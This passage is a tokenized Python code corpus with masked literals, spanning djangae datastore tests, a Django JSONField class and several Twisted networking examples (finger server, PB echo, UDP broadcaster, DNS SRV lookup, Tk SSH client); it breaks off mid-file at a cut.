objects . using ( "<STR_LIT>" ) . create ( id = self . i1 . pk , name = "<STR_LIT>" , counter1 = <NUM_LIT:1> , counter2 = <NUM_LIT:1> ) <EOL> self . i4 = TestModel . objects . using ( "<STR_LIT>" ) . create ( id = self . i2 . pk , name = "<STR_LIT>" , counter1 = <NUM_LIT:1> , counter2 = <NUM_LIT:2> ) <EOL> NS1_NAMESPACE = settings . DATABASES [ "<STR_LIT>" ] [ "<STR_LIT>" ] <EOL> marker1 = "<STR_LIT>" . format ( TestModel . _meta . db_table , md5 ( self . i3 . name ) . hexdigest ( ) ) <EOL> marker_key = datastore . Key . from_path ( UniqueMarker . kind ( ) , marker1 , namespace = NS1_NAMESPACE ) <EOL> default_key = datastore . Key . from_path ( UniqueMarker . kind ( ) , marker1 , namespace = DEFAULT_NAMESPACE ) <EOL> original_marker = datastore . Get ( marker_key ) <EOL> default_marker = datastore . Get ( default_key ) <EOL> marker2 = "<STR_LIT>" . format ( TestModel . _meta . db_table , md5 ( "<STR_LIT>" ) . hexdigest ( ) ) <EOL> new_marker = datastore . Entity ( UniqueMarker . kind ( ) , name = marker2 , namespace = NS1_NAMESPACE ) <EOL> new_marker . update ( original_marker ) <EOL> datastore . Put ( new_marker ) <EOL> self . i1 . delete ( ) <EOL> datastore . Put ( default_marker ) <EOL> UniqueAction . objects . create ( action_type = "<STR_LIT>" , model = encode_model ( TestModel ) , db = "<STR_LIT>" ) <EOL> process_task_queues ( ) <EOL> self . assertRaises ( datastore_errors . EntityNotFoundError , datastore . Get , new_marker . key ( ) ) <EOL> self . assertTrue ( datastore . Get ( default_marker . key ( ) ) ) <EOL> self . assertTrue ( datastore . Get ( marker_key ) ) <EOL> datastore . Delete ( default_marker ) <EOL> @ skipIf ( "<STR_LIT>" not in settings . DATABASES , "<STR_LIT>" ) <EOL> def test_repair_missing_markers_on_non_default_namespace ( self ) : <EOL> self . i3 = TestModel . objects . using ( "<STR_LIT>" ) . create ( id = self . i1 . pk , name = "<STR_LIT>" , counter1 = <NUM_LIT:1> , counter2 = <NUM_LIT:1> ) <EOL> self . i4 = TestModel . objects . 
using ( "<STR_LIT>" ) . create ( id = self . i2 . pk , name = "<STR_LIT>" , counter1 = <NUM_LIT:1> , counter2 = <NUM_LIT:2> ) <EOL> NS1_NAMESPACE = settings . DATABASES [ "<STR_LIT>" ] [ "<STR_LIT>" ] <EOL> instance_key = datastore . Key . from_path ( TestModel . _meta . db_table , self . i2 . pk , namespace = DEFAULT_NAMESPACE ) <EOL> instance_key_ns1 = datastore . Key . from_path ( TestModel . _meta . db_table , self . i2 . pk , namespace = NS1_NAMESPACE ) <EOL> marker = "<STR_LIT>" . format ( TestModel . _meta . db_table , md5 ( self . i2 . name ) . hexdigest ( ) ) <EOL> marker_key_default = datastore . Key . from_path ( UniqueMarker . kind ( ) , marker , namespace = DEFAULT_NAMESPACE ) <EOL> marker_key_ns1 = datastore . Key . from_path ( UniqueMarker . kind ( ) , marker , namespace = NS1_NAMESPACE ) <EOL> datastore . Delete ( marker_key_ns1 ) <EOL> datastore . Delete ( marker_key_default ) <EOL> UniqueAction . objects . create ( action_type = "<STR_LIT>" , model = encode_model ( TestModel ) , db = "<STR_LIT>" ) <EOL> process_task_queues ( ) <EOL> a = UniqueAction . objects . get ( ) <EOL> self . assertEqual ( a . status , "<STR_LIT>" ) <EOL> self . assertRaises ( datastore_errors . EntityNotFoundError , datastore . Get , marker_key_default ) <EOL> marker = datastore . Get ( marker_key_ns1 ) <EOL> self . assertTrue ( marker ) <EOL> self . assertTrue ( isinstance ( marker [ "<STR_LIT>" ] , datastore . Key ) ) <EOL> self . assertEqual ( instance_key_ns1 , marker [ "<STR_LIT>" ] ) <EOL> self . assertTrue ( marker [ "<STR_LIT>" ] ) </s>
<s> """<STR_LIT>""" <EOL> from __future__ import absolute_import <EOL> import json <EOL> from collections import OrderedDict <EOL> from django . db import models <EOL> from django . conf import settings <EOL> from django . utils import six <EOL> from django . core . serializers . json import DjangoJSONEncoder <EOL> from djangae . forms . fields import JSONFormField , JSONWidget <EOL> __all__ = ( '<STR_LIT>' , ) <EOL> def dumps ( value ) : <EOL> return DjangoJSONEncoder ( ) . encode ( value ) <EOL> def loads ( txt , object_pairs_hook = None ) : <EOL> value = json . loads ( <EOL> txt , <EOL> encoding = settings . DEFAULT_CHARSET , <EOL> object_pairs_hook = object_pairs_hook , <EOL> ) <EOL> return value <EOL> class JSONDict ( dict ) : <EOL> """<STR_LIT>""" <EOL> def __repr__ ( self ) : <EOL> return dumps ( self ) <EOL> class JSONUnicode ( six . text_type ) : <EOL> """<STR_LIT>""" <EOL> def __repr__ ( self ) : <EOL> return dumps ( self ) <EOL> class JSONList ( list ) : <EOL> """<STR_LIT>""" <EOL> def __repr__ ( self ) : <EOL> return dumps ( self ) <EOL> class JSONOrderedDict ( OrderedDict ) : <EOL> """<STR_LIT>""" <EOL> def __repr__ ( self ) : <EOL> return dumps ( self ) <EOL> class JSONField ( models . TextField ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , use_ordered_dict = False , * args , ** kwargs ) : <EOL> if '<STR_LIT:default>' in kwargs : <EOL> if not callable ( kwargs [ '<STR_LIT:default>' ] ) : <EOL> raise TypeError ( "<STR_LIT>" ) <EOL> else : <EOL> kwargs [ '<STR_LIT:default>' ] = dict <EOL> self . use_ordered_dict = use_ordered_dict <EOL> models . TextField . __init__ ( self , * args , ** kwargs ) <EOL> def parse_json ( self , value ) : <EOL> """<STR_LIT>""" <EOL> if value is None or value == '<STR_LIT>' : <EOL> return { } <EOL> elif isinstance ( value , six . string_types ) : <EOL> if self . 
use_ordered_dict : <EOL> res = loads ( value , object_pairs_hook = OrderedDict ) <EOL> else : <EOL> res = loads ( value ) <EOL> if isinstance ( res , OrderedDict ) and self . use_ordered_dict : <EOL> return JSONOrderedDict ( res ) <EOL> elif isinstance ( res , dict ) : <EOL> return JSONDict ( ** res ) <EOL> elif isinstance ( res , six . string_types ) : <EOL> return JSONUnicode ( res ) <EOL> elif isinstance ( res , list ) : <EOL> return JSONList ( res ) <EOL> return res <EOL> else : <EOL> return value <EOL> def to_python ( self , value ) : <EOL> return self . parse_json ( value ) <EOL> def from_db_value ( self , value , expression , connection , context ) : <EOL> return self . parse_json ( value ) <EOL> def get_db_prep_save ( self , value , connection , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> if value is None and self . null : <EOL> return None <EOL> return super ( JSONField , self ) . get_db_prep_save ( dumps ( value ) , connection = connection ) <EOL> def south_field_triple ( self ) : <EOL> """<STR_LIT>""" <EOL> from south . modelsinspector import introspector <EOL> field_class = "<STR_LIT>" <EOL> args , kwargs = introspector ( self ) <EOL> return ( field_class , args , kwargs ) <EOL> def deconstruct ( self ) : <EOL> name , path , args , kwargs = super ( JSONField , self ) . deconstruct ( ) <EOL> if self . default == { } : <EOL> del kwargs [ '<STR_LIT:default>' ] <EOL> return name , path , args , kwargs <EOL> def formfield ( self , ** kwargs ) : <EOL> defaults = { <EOL> '<STR_LIT>' : JSONFormField , <EOL> '<STR_LIT>' : JSONWidget , <EOL> } <EOL> defaults . update ( kwargs ) <EOL> return super ( JSONField , self ) . formfield ( ** defaults ) </s>
<s> from djangae . utils import on_production <EOL> def fix_c_whitelist ( ) : <EOL> from google . appengine . tools . devappserver2 . python import sandbox <EOL> if '<STR_LIT>' not in sandbox . _WHITE_LIST_C_MODULES : <EOL> sandbox . _WHITE_LIST_C_MODULES . extend ( [ <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' <EOL> ] ) <EOL> if not on_production ( ) : <EOL> fix_c_whitelist ( ) <EOL> def fix_sandbox ( ) : <EOL> """<STR_LIT>""" <EOL> if on_production ( ) : <EOL> return <EOL> from google . appengine . tools . devappserver2 . python import sandbox <EOL> if '<STR_LIT>' not in sandbox . _WHITE_LIST_C_MODULES : <EOL> fix_c_whitelist ( ) <EOL> import imp <EOL> import os <EOL> import ast <EOL> psocket = os . path . join ( os . path . dirname ( ast . __file__ ) , '<STR_LIT>' ) <EOL> imp . load_source ( '<STR_LIT>' , psocket ) <EOL> class DjangaeApplication ( object ) : <EOL> def __init__ ( self , application ) : <EOL> from django . conf import settings <EOL> from django . core . exceptions import ImproperlyConfigured <EOL> from django import VERSION <EOL> for app in settings . INSTALLED_APPS : <EOL> if app . startswith ( "<STR_LIT>" ) : <EOL> raise ImproperlyConfigured ( "<STR_LIT>" ) <EOL> elif app == "<STR_LIT>" : <EOL> break <EOL> self . wrapped_app = application <EOL> def __call__ ( self , environ , start_response ) : <EOL> fix_sandbox ( ) <EOL> return self . wrapped_app ( environ , start_response ) </s>
<s> """<STR_LIT>""" <EOL> import socket , time , sys <EOL> TIMES = <NUM_LIT> <EOL> S = "<STR_LIT>" * <NUM_LIT> <EOL> sent = len ( S ) * TIMES <EOL> def main ( ) : <EOL> s = socket . socket ( socket . AF_INET , socket . SOCK_STREAM ) <EOL> s . connect ( ( sys . argv [ <NUM_LIT:1> ] , int ( sys . argv [ <NUM_LIT:2> ] ) ) ) <EOL> start = time . time ( ) <EOL> i = <NUM_LIT:0> <EOL> while i < TIMES : <EOL> i += <NUM_LIT:1> <EOL> s . sendall ( S ) <EOL> passed = time . time ( ) - start <EOL> print "<STR_LIT>" % ( ( sent / passed ) / <NUM_LIT> ) <EOL> s . close ( ) <EOL> if __name__ == '<STR_LIT:__main__>' : <EOL> main ( ) </s>
<s> from twisted . internet import reactor <EOL> from twisted . spread import pb <EOL> from twisted . cred . credentials import UsernamePassword <EOL> from pbecho import DefinedError <EOL> def success ( message ) : <EOL> print "<STR_LIT>" , message <EOL> def failure ( error ) : <EOL> t = error . trap ( DefinedError ) <EOL> print "<STR_LIT>" , t <EOL> reactor . stop ( ) <EOL> def connected ( perspective ) : <EOL> perspective . callRemote ( '<STR_LIT>' , "<STR_LIT>" ) . addCallbacks ( success , failure ) <EOL> perspective . callRemote ( '<STR_LIT:error>' ) . addCallbacks ( success , failure ) <EOL> print "<STR_LIT>" <EOL> factory = pb . PBClientFactory ( ) <EOL> reactor . connectTCP ( "<STR_LIT:localhost>" , pb . portno , factory ) <EOL> factory . login ( <EOL> UsernamePassword ( "<STR_LIT>" , "<STR_LIT>" ) ) . addCallbacks ( connected , failure ) <EOL> reactor . run ( ) </s>
<s> """<STR_LIT>""" <EOL> from uuid import uuid4 <EOL> from twisted . application import internet , service <EOL> from twisted . internet . protocol import DatagramProtocol <EOL> from twisted . python import log <EOL> class PingPongProtocol ( DatagramProtocol ) : <EOL> noisy = False <EOL> def __init__ ( self , controller , port ) : <EOL> self . port = port <EOL> def startProtocol ( self ) : <EOL> self . transport . setBroadcastAllowed ( True ) <EOL> def sendPing ( self ) : <EOL> pingMsg = "<STR_LIT>" . format ( uuid4 ( ) . hex ) <EOL> self . transport . write ( pingMsg , ( '<STR_LIT>' , self . port ) ) <EOL> log . msg ( "<STR_LIT>" + pingMsg ) <EOL> def datagramReceived ( self , datagram , addr ) : <EOL> if datagram [ : <NUM_LIT:4> ] == "<STR_LIT>" : <EOL> uuid = datagram [ <NUM_LIT:5> : ] <EOL> pongMsg = "<STR_LIT>" . format ( uuid ) <EOL> self . transport . write ( pongMsg , ( '<STR_LIT>' , self . port ) ) <EOL> log . msg ( "<STR_LIT>" + datagram ) <EOL> elif datagram [ : <NUM_LIT:4> ] == "<STR_LIT>" : <EOL> log . msg ( "<STR_LIT>" + datagram ) <EOL> class Broadcaster ( object ) : <EOL> def ping ( self , proto ) : <EOL> proto . sendPing ( ) <EOL> def makeService ( self ) : <EOL> application = service . Application ( '<STR_LIT>' ) <EOL> root = service . MultiService ( ) <EOL> root . setServiceParent ( application ) <EOL> proto = PingPongProtocol ( controller = self , port = <NUM_LIT> ) <EOL> root . addService ( internet . UDPServer ( <NUM_LIT> , proto ) ) <EOL> root . addService ( internet . TimerService ( <NUM_LIT:1> , self . ping , proto ) ) <EOL> return application <EOL> application = Broadcaster ( ) . makeService ( ) </s>
<s> from twisted . spread import pb <EOL> from twisted . internet import reactor <EOL> class Two ( pb . Referenceable ) : <EOL> def remote_print ( self , arg ) : <EOL> print "<STR_LIT>" , arg <EOL> class One ( pb . Root ) : <EOL> def __init__ ( self , two ) : <EOL> self . two = two <EOL> def remote_getTwo ( self ) : <EOL> print "<STR_LIT>" , self . two <EOL> return self . two <EOL> def remote_checkTwo ( self , newtwo ) : <EOL> print "<STR_LIT>" , self . two <EOL> print "<STR_LIT>" , newtwo <EOL> if self . two == newtwo : <EOL> print "<STR_LIT>" <EOL> two = Two ( ) <EOL> root_obj = One ( two ) <EOL> reactor . listenTCP ( <NUM_LIT> , pb . PBServerFactory ( root_obj ) ) <EOL> reactor . run ( ) </s>
<s> from twisted . protocols import basic , policies <EOL> from twisted . internet import defer <EOL> class ClientTimeoutError ( Exception ) : <EOL> pass <EOL> class RemoteCalculationClient ( object , basic . LineReceiver , policies . TimeoutMixin ) : <EOL> def __init__ ( self ) : <EOL> self . results = [ ] <EOL> self . _timeOut = <NUM_LIT> <EOL> def lineReceived ( self , line ) : <EOL> self . setTimeout ( None ) <EOL> d = self . results . pop ( <NUM_LIT:0> ) <EOL> d . callback ( int ( line ) ) <EOL> def timeoutConnection ( self ) : <EOL> for d in self . results : <EOL> d . errback ( ClientTimeoutError ( ) ) <EOL> self . transport . loseConnection ( ) <EOL> def _sendOperation ( self , op , a , b ) : <EOL> d = defer . Deferred ( ) <EOL> self . results . append ( d ) <EOL> line = "<STR_LIT>" % ( op , a , b ) <EOL> self . sendLine ( line ) <EOL> self . setTimeout ( self . _timeOut ) <EOL> return d <EOL> def add ( self , a , b ) : <EOL> return self . _sendOperation ( "<STR_LIT>" , a , b ) <EOL> def subtract ( self , a , b ) : <EOL> return self . _sendOperation ( "<STR_LIT>" , a , b ) <EOL> def multiply ( self , a , b ) : <EOL> return self . _sendOperation ( "<STR_LIT>" , a , b ) <EOL> def divide ( self , a , b ) : <EOL> return self . _sendOperation ( "<STR_LIT>" , a , b ) </s>
<s> from twisted . internet import protocol , reactor , defer , utils <EOL> from twisted . protocols import basic <EOL> class FingerProtocol ( basic . LineReceiver ) : <EOL> def lineReceived ( self , user ) : <EOL> d = self . factory . getUser ( user ) <EOL> def onError ( err ) : <EOL> return '<STR_LIT>' <EOL> d . addErrback ( onError ) <EOL> def writeResponse ( message ) : <EOL> self . transport . write ( message + '<STR_LIT:\r\n>' ) <EOL> self . transport . loseConnection ( ) <EOL> d . addCallback ( writeResponse ) <EOL> class FingerFactory ( protocol . ServerFactory ) : <EOL> protocol = FingerProtocol <EOL> def getUser ( self , user ) : <EOL> return utils . getProcessOutput ( "<STR_LIT>" , [ user ] ) <EOL> reactor . listenTCP ( <NUM_LIT> , FingerFactory ( ) ) <EOL> reactor . run ( ) </s>
<s> """<STR_LIT>""" <EOL> import sys <EOL> from twisted . names import client , error <EOL> from twisted . internet . task import react <EOL> from twisted . python import usage <EOL> class Options ( usage . Options ) : <EOL> synopsis = '<STR_LIT>' <EOL> def parseArgs ( self , service , proto , domainname ) : <EOL> self [ '<STR_LIT>' ] = service <EOL> self [ '<STR_LIT>' ] = proto <EOL> self [ '<STR_LIT>' ] = domainname <EOL> def printResult ( records , domainname ) : <EOL> """<STR_LIT>""" <EOL> answers , authority , additional = records <EOL> if answers : <EOL> sys . stdout . write ( <EOL> domainname + '<STR_LIT>' + <EOL> '<STR_LIT>' . join ( str ( x . payload ) for x in answers ) + <EOL> '<STR_LIT:\n>' ) <EOL> else : <EOL> sys . stderr . write ( <EOL> '<STR_LIT>' % ( domainname , ) ) <EOL> def printError ( failure , domainname ) : <EOL> """<STR_LIT>""" <EOL> failure . trap ( error . DNSNameError ) <EOL> sys . stderr . write ( '<STR_LIT>' % ( domainname , ) ) <EOL> def main ( reactor , * argv ) : <EOL> options = Options ( ) <EOL> try : <EOL> options . parseOptions ( argv ) <EOL> except usage . UsageError as errortext : <EOL> sys . stderr . write ( str ( options ) + '<STR_LIT:\n>' ) <EOL> sys . stderr . write ( '<STR_LIT>' % ( errortext , ) ) <EOL> raise SystemExit ( <NUM_LIT:1> ) <EOL> resolver = client . Resolver ( '<STR_LIT>' ) <EOL> domainname = '<STR_LIT>' % options <EOL> d = resolver . lookupService ( domainname ) <EOL> d . addCallback ( printResult , domainname ) <EOL> d . addErrback ( printError , domainname ) <EOL> return d <EOL> if __name__ == '<STR_LIT:__main__>' : <EOL> react ( main , sys . argv [ <NUM_LIT:1> : ] ) </s>
<s> """<STR_LIT>""" <EOL> from __future__ import print_function <EOL> from sys import argv <EOL> from zope . interface import implementer <EOL> from twisted . internet . endpoints import UNIXClientEndpoint <EOL> from twisted . internet . task import react <EOL> from twisted . web . iweb import IAgentEndpointFactory <EOL> from twisted . web . client import Agent , readBody <EOL> @ implementer ( IAgentEndpointFactory ) <EOL> class DockerEndpointFactory ( object ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , reactor ) : <EOL> self . reactor = reactor <EOL> def endpointForURI ( self , uri ) : <EOL> return UNIXClientEndpoint ( self . reactor , b"<STR_LIT>" ) <EOL> def main ( reactor , path = b"<STR_LIT>" ) : <EOL> agent = Agent . usingEndpointFactory ( reactor , DockerEndpointFactory ( reactor ) ) <EOL> d = agent . request ( b'<STR_LIT:GET>' , b"<STR_LIT>" + path ) <EOL> d . addCallback ( readBody ) <EOL> d . addCallback ( print ) <EOL> return d <EOL> react ( main , argv [ <NUM_LIT:1> : ] ) </s>
<s> """<STR_LIT>""" <EOL> from twisted . words . im import basechat , baseaccount , ircsupport <EOL> accounts = [ <EOL> ircsupport . IRCAccount ( "<STR_LIT>" , <NUM_LIT:1> , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> <NUM_LIT> , <EOL> "<STR_LIT>" , <EOL> ) <EOL> ] <EOL> class AccountManager ( baseaccount . AccountManager ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self ) : <EOL> self . chatui = MinChat ( ) <EOL> if len ( accounts ) == <NUM_LIT:0> : <EOL> print "<STR_LIT>" <EOL> for acct in accounts : <EOL> acct . logOn ( self . chatui ) <EOL> class MinConversation ( basechat . Conversation ) : <EOL> """<STR_LIT>""" <EOL> def show ( self ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> def hide ( self ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> def showMessage ( self , text , metadata = None ) : <EOL> print "<STR_LIT>" % ( self . person . name , text ) <EOL> def contactChangedNick ( self , person , newnick ) : <EOL> basechat . Conversation . contactChangedNick ( self , person , newnick ) <EOL> print "<STR_LIT>" % ( person . name , newnick ) <EOL> class MinGroupConversation ( basechat . GroupConversation ) : <EOL> """<STR_LIT>""" <EOL> def show ( self ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> def hide ( self ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> def showGroupMessage ( self , sender , text , metadata = None ) : <EOL> print "<STR_LIT>" % ( sender , self . group . name , text ) <EOL> def setTopic ( self , topic , author ) : <EOL> print "<STR_LIT>" % ( author , <EOL> self . group . name , topic ) <EOL> def memberJoined ( self , member ) : <EOL> basechat . GroupConversation . memberJoined ( self , member ) <EOL> print "<STR_LIT>" % ( member , self . group . name ) <EOL> def memberChangedNick ( self , oldnick , newnick ) : <EOL> basechat . GroupConversation . memberChangedNick ( self , oldnick , newnick ) <EOL> print "<STR_LIT>" % ( oldnick , newnick , <EOL> self . group . name ) <EOL> def memberLeft ( self , member ) : <EOL> basechat . 
GroupConversation . memberLeft ( self , member ) <EOL> print "<STR_LIT>" % ( member , self . group . name ) <EOL> class MinChat ( basechat . ChatUI ) : <EOL> """<STR_LIT>""" <EOL> def getGroupConversation ( self , group , Class = MinGroupConversation , <EOL> stayHidden = <NUM_LIT:0> ) : <EOL> return basechat . ChatUI . getGroupConversation ( self , group , Class , <EOL> stayHidden ) <EOL> def getConversation ( self , person , Class = MinConversation , <EOL> stayHidden = <NUM_LIT:0> ) : <EOL> return basechat . ChatUI . getConversation ( self , person , Class , stayHidden ) <EOL> if __name__ == "<STR_LIT:__main__>" : <EOL> from twisted . internet import reactor <EOL> AccountManager ( ) <EOL> reactor . run ( ) </s>
<s> """<STR_LIT>""" <EOL> import Tkinter , tkFileDialog , tkMessageBox <EOL> from twisted . conch import error <EOL> from twisted . conch . ui import tkvt100 <EOL> from twisted . conch . ssh import transport , userauth , connection , common , keys <EOL> from twisted . conch . ssh import session , forwarding , channel <EOL> from twisted . conch . client . default import isInKnownHosts <EOL> from twisted . internet import reactor , defer , protocol , tksupport <EOL> from twisted . python import usage , log <EOL> import os , sys , getpass , struct , base64 , signal <EOL> class TkConchMenu ( Tkinter . Frame ) : <EOL> def __init__ ( self , * args , ** params ) : <EOL> apply ( Tkinter . Frame . __init__ , ( self , ) + args , params ) <EOL> self . master . title ( '<STR_LIT>' ) <EOL> self . localRemoteVar = Tkinter . StringVar ( ) <EOL> self . localRemoteVar . set ( '<STR_LIT>' ) <EOL> Tkinter . Label ( self , anchor = '<STR_LIT:w>' , justify = '<STR_LIT:left>' , text = '<STR_LIT>' ) . grid ( column = <NUM_LIT:1> , row = <NUM_LIT:1> , sticky = '<STR_LIT:w>' ) <EOL> self . host = Tkinter . Entry ( self ) <EOL> self . host . grid ( column = <NUM_LIT:2> , columnspan = <NUM_LIT:2> , row = <NUM_LIT:1> , sticky = '<STR_LIT>' ) <EOL> Tkinter . Label ( self , anchor = '<STR_LIT:w>' , justify = '<STR_LIT:left>' , text = '<STR_LIT>' ) . grid ( column = <NUM_LIT:1> , row = <NUM_LIT:2> , sticky = '<STR_LIT:w>' ) <EOL> self . port = Tkinter . Entry ( self ) <EOL> self . port . grid ( column = <NUM_LIT:2> , columnspan = <NUM_LIT:2> , row = <NUM_LIT:2> , sticky = '<STR_LIT>' ) <EOL> Tkinter . Label ( self , anchor = '<STR_LIT:w>' , justify = '<STR_LIT:left>' , text = '<STR_LIT>' ) . grid ( column = <NUM_LIT:1> , row = <NUM_LIT:3> , sticky = '<STR_LIT:w>' ) <EOL> self . user = Tkinter . Entry ( self ) <EOL> self . user . grid ( column = <NUM_LIT:2> , columnspan = <NUM_LIT:2> , row = <NUM_LIT:3> , sticky = '<STR_LIT>' ) <EOL> Tkinter . 
Label ( self , anchor = '<STR_LIT:w>' , justify = '<STR_LIT:left>' , text = '<STR_LIT>' ) . grid ( column = <NUM_LIT:1> , row = <NUM_LIT:4> , sticky = '<STR_LIT:w>' ) <EOL> self . command = Tkinter . Entry ( self ) <EOL> self . command . grid ( column = <NUM_LIT:2> , columnspan = <NUM_LIT:2> , row = <NUM_LIT:4> , sticky = '<STR_LIT>' ) <EOL> Tkinter . Label ( self , anchor = '<STR_LIT:w>' , justify = '<STR_LIT:left>' , text = '<STR_LIT>' ) . grid ( column = <NUM_LIT:1> , row = <NUM_LIT:5> , sticky = '<STR_LIT:w>' ) <EOL> self . identity = Tkinter . Entry ( self ) <EOL> self . identity . grid ( column = <NUM_LIT:2> , row = <NUM_LIT:5> , sticky = '<STR_LIT>' ) <EOL> Tkinter . Button ( self , command = self . getIdentityFile , text = '<STR_LIT>' ) . grid ( column = <NUM_LIT:3> , row = <NUM_LIT:5> , sticky = '<STR_LIT>' ) <EOL> Tkinter . Label ( self , text = '<STR_LIT>' ) . grid ( column = <NUM_LIT:1> , row = <NUM_LIT:6> , sticky = '<STR_LIT:w>' ) <EOL> self . forwards = Tkinter . Listbox ( self , height = <NUM_LIT:0> , width = <NUM_LIT:0> ) <EOL> self . forwards . grid ( column = <NUM_LIT:2> , columnspan = <NUM_LIT:2> , row = <NUM_LIT:6> , sticky = '<STR_LIT>' ) <EOL> Tkinter . Button ( self , text = '<STR_LIT>' , command = self . addForward ) . grid ( column = <NUM_LIT:1> , row = <NUM_LIT:7> ) <EOL> Tkinter . Button ( self , text = '<STR_LIT>' , command = self . removeForward ) . grid ( column = <NUM_LIT:1> , row = <NUM_LIT:8> ) <EOL> self . forwardPort = Tkinter . Entry ( self ) <EOL> self . forwardPort . grid ( column = <NUM_LIT:2> , row = <NUM_LIT:7> , sticky = '<STR_LIT>' ) <EOL> Tkinter . Label ( self , text = '<STR_LIT>' ) . grid ( column = <NUM_LIT:3> , row = <NUM_LIT:7> , sticky = '<STR_LIT>' ) <EOL> self . forwardHost = Tkinter . Entry ( self ) <EOL> self . forwardHost . grid ( column = <NUM_LIT:2> , row = <NUM_LIT:8> , sticky = '<STR_LIT>' ) <EOL> Tkinter . Label ( self , text = '<STR_LIT>' ) . 
grid ( column = <NUM_LIT:3> , row = <NUM_LIT:8> , sticky = '<STR_LIT>' ) <EOL> self . localForward = Tkinter . Radiobutton ( self , text = '<STR_LIT>' , variable = self . localRemoteVar , value = '<STR_LIT>' ) <EOL> self . localForward . grid ( column = <NUM_LIT:2> , row = <NUM_LIT:9> ) <EOL> self . remoteForward = Tkinter . Radiobutton ( self , text = '<STR_LIT>' , variable = self . localRemoteVar , value = '<STR_LIT>' ) <EOL> self . remoteForward . grid ( column = <NUM_LIT:3> , row = <NUM_LIT:9> ) <EOL> Tkinter . Label ( self , text = '<STR_LIT>' ) . grid ( column = <NUM_LIT:1> , columnspan = <NUM_LIT:3> , row = <NUM_LIT:10> , sticky = '<STR_LIT>' ) <EOL> Tkinter . Label ( self , anchor = '<STR_LIT:w>' , justify = '<STR_LIT:left>' , text = '<STR_LIT>' ) . grid ( column = <NUM_LIT:1> , row = <NUM_LIT:11> , sticky = '<STR_LIT:w>' ) <EOL> self . cipher = Tkinter . Entry ( self , name = '<STR_LIT>' ) <EOL> self . cipher . grid ( column = <NUM_LIT:2> , columnspan = <NUM_LIT:2> , row = <NUM_LIT:11> , sticky = '<STR_LIT>' ) <EOL> Tkinter . Label ( self , anchor = '<STR_LIT:w>' , justify = '<STR_LIT:left>' , text = '<STR_LIT>' ) . grid ( column = <NUM_LIT:1> , row = <NUM_LIT:12> , sticky = '<STR_LIT:w>' ) <EOL> self . mac = Tkinter . Entry ( self , name = '<STR_LIT>' ) <EOL> self . mac . grid ( column = <NUM_LIT:2> , columnspan = <NUM_LIT:2> , row = <NUM_LIT:12> , sticky = '<STR_LIT>' ) <EOL> Tkinter . Label ( self , anchor = '<STR_LIT:w>' , justify = '<STR_LIT:left>' , text = '<STR_LIT>' ) . grid ( column = <NUM_LIT:1> , row = <NUM_LIT> , sticky = '<STR_LIT:w>' ) <EOL> self . escape = Tkinter . Entry ( self , name = '<STR_LIT>' ) <EOL> self . escape . grid ( column = <NUM_LIT:2> , columnspan = <NUM_LIT:2> , row = <NUM_LIT> , sticky = '<STR_LIT>' ) <EOL> Tkinter . Button ( self , text = '<STR_LIT>' , command = self . doConnect ) . grid ( column = <NUM_LIT:1> , columnspan = <NUM_LIT:3> , row = <NUM_LIT> , sticky = '<STR_LIT>' ) <EOL> self . 
grid_rowconfigure ( <NUM_LIT:6> , weight = <NUM_LIT:1> , minsize = <NUM_LIT:64> ) <EOL> self . grid_columnconfigure ( <NUM_LIT:2> , weight = <NUM_LIT:1> , minsize = <NUM_LIT:2> ) <EOL> self . master . protocol ( "<STR_LIT>" , sys . exit ) <EOL> def getIdentityFile ( self ) : <EOL> r = tkFileDialog . askopenfilename ( ) <EOL> if r : <EOL> self . identity . delete ( <NUM_LIT:0> , Tkinter . END ) <EOL> self . identity . insert ( Tkinter . END , r ) <EOL> def addForward ( self ) : <EOL> port = self . forwardPort . get ( ) <EOL> self . forwardPort . delete ( <NUM_LIT:0> , Tkinter . END ) <EOL> host = self . forwardHost . get ( ) <EOL> self . forwardHost . delete ( <NUM_LIT:0> , Tkinter . END ) <EOL> if self . localRemoteVar . get ( ) == '<STR_LIT>' : <EOL> self . forwards . insert ( Tkinter . END , '<STR_LIT>' % ( port , host ) ) <EOL> else : <EOL> self . forwards . insert ( Tkinter . END , '<STR_LIT>' % ( port , host ) ) <EOL> def removeForward ( self ) : <EOL> cur = self . forwards . curselection ( ) <EOL> if cur : <EOL> self . forwards . remove ( cur [ <NUM_LIT:0> ] ) <EOL> def doConnect ( self ) : <EOL> finished = <NUM_LIT:1> <EOL> options [ '<STR_LIT:host>' ] = self . host . get ( ) <EOL> options [ '<STR_LIT:port>' ] = self . port . get ( ) <EOL> options [ '<STR_LIT:user>' ] = self . user . get ( ) <EOL> options [ '<STR_LIT>' ] = self . command . get ( ) <EOL> cipher = self . cipher . get ( ) <EOL> mac = self . mac . get ( ) <EOL> escape = self . escape . get ( ) <EOL> if cipher : <EOL> if cipher in SSHClientTransport . supportedCiphers : <EOL> SSHClientTransport . supportedCiphers = [ cipher ] <EOL> else : <EOL> tkMessageBox . showerror ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> finished = <NUM_LIT:0> <EOL> if mac : <EOL> if mac in SSHClientTransport . supportedMACs : <EOL> SSHClientTransport . supportedMACs = [ mac ] <EOL> elif finished : <EOL> tkMessageBox . 
